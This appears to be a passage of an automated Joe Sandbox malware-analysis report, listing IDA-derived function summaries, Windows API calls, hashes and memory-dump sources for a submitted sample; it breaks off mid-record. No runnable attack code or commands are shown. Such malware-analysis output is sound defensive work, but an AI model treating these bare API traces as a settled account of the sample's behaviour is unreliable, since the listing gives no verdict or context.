                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: CountCriticalInitializeSectionSpin
                  • String ID: InitializeCriticalSectionEx
                  • API String ID: 2593887523-3084827643
                  • Opcode ID: 78146d3877ee2c04f05cc48b7d588f1ff3b5e64379a4ca07ebca8d5cef1c1ab4
                  • Instruction ID: 094531a0805620102427ab48dbb8a5999a9ce6c9bb3d78d6dfd31032e1190cf9
                  • Opcode Fuzzy Hash: 78146d3877ee2c04f05cc48b7d588f1ff3b5e64379a4ca07ebca8d5cef1c1ab4
                  • Instruction Fuzzy Hash: 70F0E23564521CBBCF056F60CC0ADAEBFA1FF16760B454054FC191A260DB729E50EBD1
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Alloc
                  • String ID: FlsAlloc
                  • API String ID: 2773662609-671089009
                  • Opcode ID: bb24eeba6455b0a6135d1805f8cd8514a498127de8fa0fd6cec6a8e1420ee86b
                  • Instruction ID: 933b293b84e8b99a4edf22a9e1b4ebb0b6496a6f886aacbf32bbb87cb5cc14cc
                  • Opcode Fuzzy Hash: bb24eeba6455b0a6135d1805f8cd8514a498127de8fa0fd6cec6a8e1420ee86b
                  • Instruction Fuzzy Hash: FBE05570B452286BDB146B608C06AAEBB90DF26710B820015FC0817280CF704F00AAD6
                  APIs
                  • try_get_function.LIBVCRUNTIME ref: 001932AF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: try_get_function
                  • String ID: FlsAlloc
                  • API String ID: 2742660187-671089009
                  • Opcode ID: 62542b19b851c294adc3422c5b2d64212ccf0d88c5cc2ede0da3359dec3a9aca
                  • Instruction ID: b24702b6f2c361b20424c2d6b5864fcdf64e63f734e57e1de0895e576e405923
                  • Opcode Fuzzy Hash: 62542b19b851c294adc3422c5b2d64212ccf0d88c5cc2ede0da3359dec3a9aca
                  • Instruction Fuzzy Hash: 75D02B66B846346AC61236D06C03AAE7E458703FF1F450162FE0C1A14387A1464002C5
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018E20B
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID: 3Ro
                  • API String ID: 1269201914-1492261280
                  • Opcode ID: c21b7b4414225026317cad98c4fda804d0165a4a23c8b76a7ae78b33e12c9ff1
                  • Instruction ID: 11f1753ee468011696cf7cdc7e7b60850e4391c74e9b6c0c5d8f944154a109b8
                  • Opcode Fuzzy Hash: c21b7b4414225026317cad98c4fda804d0165a4a23c8b76a7ae78b33e12c9ff1
                  • Instruction Fuzzy Hash: C1B012A526E1017C320C31017E06C37036DC6D0B51330801FF215E40C1D7404E065932
                  APIs
                    • Part of subcall function 0019AF1B: GetOEMCP.KERNEL32(00000000,?,?,0019B1A5,?), ref: 0019AF46
                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0019B1EA,?,00000000), ref: 0019B3C4
                  • GetCPInfo.KERNEL32(00000000,0019B1EA,?,?,?,0019B1EA,?,00000000), ref: 0019B3D7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: CodeInfoPageValid
                  • String ID:
                  • API String ID: 546120528-0
                  • Opcode ID: 34c7f1c30d0fba45be9b781d7c665c242bccbd1104260855e6940488eafef980
                  • Instruction ID: cd0186fa237942127dbbd6d24b5b218b44f8b31b6cbb6a86f81ec5b2504eae4c
                  • Opcode Fuzzy Hash: 34c7f1c30d0fba45be9b781d7c665c242bccbd1104260855e6940488eafef980
                  • Instruction Fuzzy Hash: 31515470A082059EDF249F75E9C06BABBE5EF51310F18806EE0978B253D7399946EB81
                  APIs
                  • __EH_prolog.LIBCMT ref: 00171385
                    • Part of subcall function 00176057: __EH_prolog.LIBCMT ref: 0017605C
                    • Part of subcall function 0017C827: __EH_prolog.LIBCMT ref: 0017C82C
                    • Part of subcall function 0017C827: new.LIBCMT ref: 0017C86F
                    • Part of subcall function 0017C827: new.LIBCMT ref: 0017C893
                  • new.LIBCMT ref: 001713FE
                    • Part of subcall function 0017B07D: __EH_prolog.LIBCMT ref: 0017B082
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: eb45b1bc762ee8919f0d10139ba77fc17ebf4c8af98783c9b0f1fc28f087e7fd
                  • Instruction ID: 2327c7de85dfdf68c4f8067208ce8e91dbae84f721a8b666b83b9433a3308175
                  • Opcode Fuzzy Hash: eb45b1bc762ee8919f0d10139ba77fc17ebf4c8af98783c9b0f1fc28f087e7fd
                  • Instruction Fuzzy Hash: 164116B0905B40DED724DF7984859E6FAF6FB28300F504A2EE6EE83282DB326554CB11
                  APIs
                  • __EH_prolog.LIBCMT ref: 00171385
                    • Part of subcall function 00176057: __EH_prolog.LIBCMT ref: 0017605C
                    • Part of subcall function 0017C827: __EH_prolog.LIBCMT ref: 0017C82C
                    • Part of subcall function 0017C827: new.LIBCMT ref: 0017C86F
                    • Part of subcall function 0017C827: new.LIBCMT ref: 0017C893
                  • new.LIBCMT ref: 001713FE
                    • Part of subcall function 0017B07D: __EH_prolog.LIBCMT ref: 0017B082
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 20737230d4ac0a86b26aa68847b18568b23f3f2c70de19dfeafeaf108705c889
                  • Instruction ID: e8d602a7cb6cc43a8d85faedd9e395077f1eacce687c0f1c9136302586a471e9
                  • Opcode Fuzzy Hash: 20737230d4ac0a86b26aa68847b18568b23f3f2c70de19dfeafeaf108705c889
                  • Instruction Fuzzy Hash: 634116B0905B409ED724DF7984859E7FAF5FB29300F504A2EE5EE83282DB326554CB11
                  APIs
                    • Part of subcall function 00198FA5: GetLastError.KERNEL32(?,001B0EE8,00193E14,001B0EE8,?,?,00193713,00000050,?,001B0EE8,00000200), ref: 00198FA9
                    • Part of subcall function 00198FA5: _free.LIBCMT ref: 00198FDC
                    • Part of subcall function 00198FA5: SetLastError.KERNEL32(00000000,?,001B0EE8,00000200), ref: 0019901D
                    • Part of subcall function 00198FA5: _abort.LIBCMT ref: 00199023
                    • Part of subcall function 0019B2AE: _abort.LIBCMT ref: 0019B2E0
                    • Part of subcall function 0019B2AE: _free.LIBCMT ref: 0019B314
                    • Part of subcall function 0019AF1B: GetOEMCP.KERNEL32(00000000,?,?,0019B1A5,?), ref: 0019AF46
                  • _free.LIBCMT ref: 0019B200
                  • _free.LIBCMT ref: 0019B236
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: _free$ErrorLast_abort
                  • String ID:
                  • API String ID: 2991157371-0
                  • Opcode ID: ad38e3ed4d2943a6fd6166db8ba30361bf1bf44e68431e05fc96ec08a7e0ee86
                  • Instruction ID: 5a162f6686c3d440db08ca70e00748577ea65f58936e7cca18c8553d627c51df
                  • Opcode Fuzzy Hash: ad38e3ed4d2943a6fd6166db8ba30361bf1bf44e68431e05fc96ec08a7e0ee86
                  • Instruction Fuzzy Hash: A231EB31908208AFDF10EFA9E991BADB7F5EF56320F2540A9F4149B291EB71AD41CB50
                  APIs
                  • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00179EDC,?,?,00177867), ref: 001797A6
                  • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00179EDC,?,?,00177867), ref: 001797DB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 1250524b07b7dfc82e64d27a743c19f69c285dc5da2c963180c17207a98ca5c2
                  • Instruction ID: 65e2c3943f99373596e3c0c3d2949d3cfcb02d00ecaac53149f36cdc597fb262
                  • Opcode Fuzzy Hash: 1250524b07b7dfc82e64d27a743c19f69c285dc5da2c963180c17207a98ca5c2
                  • Instruction Fuzzy Hash: E021F6B1114748AFD7348F64CC86BA777F8EB49764F00892DF5E9821A1C374AC898F61
                  APIs
                  • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00177547,?,?,?,?), ref: 00179D7C
                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 00179E2C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: File$BuffersFlushTime
                  • String ID:
                  • API String ID: 1392018926-0
                  • Opcode ID: f61f29ce719aed4da345dd954d567ecd31a6d5a579dc263156421de270cde6ae
                  • Instruction ID: d16f3dcba636dfa8a3a1433c69212bb14e2a33c36062eb1afa151e4217c0f2f0
                  • Opcode Fuzzy Hash: f61f29ce719aed4da345dd954d567ecd31a6d5a579dc263156421de270cde6ae
                  • Instruction Fuzzy Hash: 1621D631148286AFC725DE64C451EABBBF4AF56704F04881DB8D587541D329DA0CDB51
                  APIs
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0019A4B8
                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0019A4C5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AddressProc__crt_fast_encode_pointer
                  • String ID:
                  • API String ID: 2279764990-0
                  • Opcode ID: 80c6c35aac183d3161e3c473c3bce533136377885dfa9228f5b4bc114b51ffb4
                  • Instruction ID: 76da2874eeb7df2114460ddc23db1788340e204ab4317cf40117063b253c5232
                  • Opcode Fuzzy Hash: 80c6c35aac183d3161e3c473c3bce533136377885dfa9228f5b4bc114b51ffb4
                  • Instruction Fuzzy Hash: A6112933A011209B9F2ADE2CEC4496A73D59F81320B5E4220FD19EB644EB70EC85CBD2
                  APIs
                  • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00179B35,?,?,00000000,?,?,00178D9C,?), ref: 00179BC0
                  • GetLastError.KERNEL32 ref: 00179BCD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ErrorFileLastPointer
                  • String ID:
                  • API String ID: 2976181284-0
                  • Opcode ID: 9ee4b7c5a9086d57386cbdb556cdae328182931bb78bc61621921ed21bc5f643
                  • Instruction ID: 39c09368d12dde0ec8496b4e27ee924c52652af6f28528e6f53e4ebccb5e220f
                  • Opcode Fuzzy Hash: 9ee4b7c5a9086d57386cbdb556cdae328182931bb78bc61621921ed21bc5f643
                  • Instruction Fuzzy Hash: DB01C4313042159B8B08CE65AC94D7EB3B9EFC5722B14C62EF92A87290CB35D94D9B21
                  APIs
                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00179E76
                  • GetLastError.KERNEL32 ref: 00179E82
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ErrorFileLastPointer
                  • String ID:
                  • API String ID: 2976181284-0
                  • Opcode ID: 6c65bc3eb560cf5ea35fca32d57eb19817431acac9bacd3615cbc012d7b1bb74
                  • Instruction ID: 479e4f93896bc8c34b28d71b08979bb6c660e0f9e28689a002b9d1a652f7d771
                  • Opcode Fuzzy Hash: 6c65bc3eb560cf5ea35fca32d57eb19817431acac9bacd3615cbc012d7b1bb74
                  • Instruction Fuzzy Hash: 9F019A713042006BEB34DE29DC88B6BB6E99B89324F14893EF15AC2680DF35ED8C8711
                  APIs
                  • _free.LIBCMT ref: 00198627
                    • Part of subcall function 00198518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0019C13D,00000000,?,001967E2,?,00000008,?,001989AD,?,?,?), ref: 0019854A
                  • RtlReAllocateHeap.NTDLL(00000000,?,?,?,?,001B0F50,0017CE57,?,?,?,?,?,?), ref: 00198663
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AllocateHeap$_free
                  • String ID:
                  • API String ID: 1482568997-0
                  • Opcode ID: 4e6f5522b97f311d96d8338ae19a31cf7873fdf24184a52d58940851e14dfd07
                  • Instruction ID: dabcbefd4888541f4b3b8866328bea81afa3efb4fce0a7ff2fbdd08d0a087189
                  • Opcode Fuzzy Hash: 4e6f5522b97f311d96d8338ae19a31cf7873fdf24184a52d58940851e14dfd07
                  • Instruction Fuzzy Hash: 62F02432202115BADF212A39AC00F6F376DAFE3BB0F264126F8249F191DF30CC0095A4
                  APIs
                  • GetCurrentProcess.KERNEL32(?,?), ref: 00180915
                  • GetProcessAffinityMask.KERNEL32(00000000), ref: 0018091C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Process$AffinityCurrentMask
                  • String ID:
                  • API String ID: 1231390398-0
                  • Opcode ID: 898ff094ef801159e68de66ee0c39356bc6968ea36f5bc9eab1815d960591060
                  • Instruction ID: 8220eefaef707477b05c870f1290cf1d3137e739a034b90a4807f0d5cb4a038e
                  • Opcode Fuzzy Hash: 898ff094ef801159e68de66ee0c39356bc6968ea36f5bc9eab1815d960591060
                  • Instruction Fuzzy Hash: C4E06533E1110DAB6F4A9AA49C045BA739DDB092187125169F81AD3501E730DF058B60
                  APIs
                  • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0017A27A,?,?,?,0017A113,?,00000001,00000000,?,?), ref: 0017A458
                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0017A27A,?,?,?,0017A113,?,00000001,00000000,?,?), ref: 0017A489
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 27417fdb65c647df8a4f5ea8bef8a4dde0778f7f3f1d1aa28cc1cbeb0883c258
                  • Instruction ID: 05b931a7f55cccc4e0ccb0f76977d2b97fdcd3774352b838e1cdc112549c7230
                  • Opcode Fuzzy Hash: 27417fdb65c647df8a4f5ea8bef8a4dde0778f7f3f1d1aa28cc1cbeb0883c258
                  • Instruction Fuzzy Hash: BAF01531240209BADB126E60DC45BEA77ACBF05385F48C061BD8C961A1DB769AA8AA50
                  APIs
                  Similarity
                  • API ID: ItemText_swprintf
                  • String ID:
                  • API String ID: 3011073432-0
                  • Opcode ID: 301e6bbd44ac717bfe7af37d672b47ac7ec3f05572d1f44d596ed02e5df36c73
                  • Instruction ID: f5d44293e4717bc5355997cb01cb5cf45f99127d370be0a96ecf24b2c29d48b5
                  • Opcode Fuzzy Hash: 301e6bbd44ac717bfe7af37d672b47ac7ec3f05572d1f44d596ed02e5df36c73
                  • Instruction Fuzzy Hash: BCF0A0715003486AEB11BBB0AC07FAA3B6CAB14745F040696B604934B2DB716BA08B72
                  APIs
                  • DeleteFileW.KERNELBASE(?,?,?,0017984C,?,?,00179688,?,?,?,?,001A1FA1,000000FF), ref: 0017A13E
                  • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0017984C,?,?,00179688,?,?,?,?,001A1FA1,000000FF), ref: 0017A16C
                  Similarity
                  • API ID: DeleteFile
                  • String ID:
                  • API String ID: 4033686569-0
                  • Opcode ID: cc39b9699758c13bd6bedd85c4f96c5f1a319acf041972baed76fcfa48e01346
                  • Instruction ID: 5a1f16d2df3cdfee0ea0be27bba5051584af0a254bf480896897d62f7ada82a0
                  • Opcode Fuzzy Hash: cc39b9699758c13bd6bedd85c4f96c5f1a319acf041972baed76fcfa48e01346
                  • Instruction Fuzzy Hash: A4E092356402086BEB11AF60DC41FEA77ACBF09381F888065BD88C3060DB719ED4AF90
                  APIs
                  • GdiplusShutdown.GDIPLUS(?,?,?,?,001A1FA1,000000FF), ref: 0018A3D1
                  • CoUninitialize.COMBASE(?,?,?,?,001A1FA1,000000FF), ref: 0018A3D6
                  Similarity
                  • API ID: GdiplusShutdownUninitialize
                  • String ID:
                  • API String ID: 3856339756-0
                  • Opcode ID: 3ee68c03312fc0514870e4377f664e48e730ebc6739e3822e79d48877c576d40
                  • Instruction ID: 3d1106dd0a1fa2d20310e011679d15038323d4f89b94242171ba174b2aabfe54
                  • Opcode Fuzzy Hash: 3ee68c03312fc0514870e4377f664e48e730ebc6739e3822e79d48877c576d40
                  • Instruction Fuzzy Hash: C5F06D32618655EFCB10EB4CDC45B59FBADFB89B20F04436AF41983B60CB746800CB91
                  APIs
                  • GetFileAttributesW.KERNELBASE(?,?,?,0017A189,?,001776B2,?,?,?,?), ref: 0017A1A5
                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0017A189,?,001776B2,?,?,?,?), ref: 0017A1D1
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: d99778b8b7b964523c1ec99d8e73e4a08d87ccb405727fa5e8bc891df11e8bd9
                  • Instruction ID: dbd9515db0e893cee20cc11bbdc8e043e3c38c8395b20e324bcb4ed2757d5255
                  • Opcode Fuzzy Hash: d99778b8b7b964523c1ec99d8e73e4a08d87ccb405727fa5e8bc891df11e8bd9
                  • Instruction Fuzzy Hash: 23E092355001285BDB20BB78DC05BD9B7ACAB193E1F4082A1FD58E36A0D7709E849BE0
                  APIs
                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001800A0
                  • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0017EB86,Crypt32.dll,00000000,0017EC0A,?,?,0017EBEC,?,?,?), ref: 001800C2
                  Similarity
                  • API ID: DirectoryLibraryLoadSystem
                  • String ID:
                  • API String ID: 1175261203-0
                  • Opcode ID: 217f95dad21aad7697d586f3e93fd95444584ba3419782bed026338fb55b60d9
                  • Instruction ID: 6e58a1e6dda46e7f918fc6a3e23a2ee0d1dad916226d7124f5be7837b4c67e84
                  • Opcode Fuzzy Hash: 217f95dad21aad7697d586f3e93fd95444584ba3419782bed026338fb55b60d9
                  • Instruction Fuzzy Hash: 5EE0127690111C6ADB21AAA49C05FD677ACFF1D382F0400A5BA48D3114DB749A84CFA0
                  APIs
                  • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00189B30
                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00189B37
                  Similarity
                  • API ID: BitmapCreateFromGdipStream
                  • String ID:
                  • API String ID: 1918208029-0
                  • Opcode ID: d41947c818c70625e9d807496358eec761721fb76f22e5f332217ba7c2df9579
                  • Instruction ID: e27d293c7a502e65f538e74f8f965845ad9fcf4e3f08d69e78ee4cfe8baeafd7
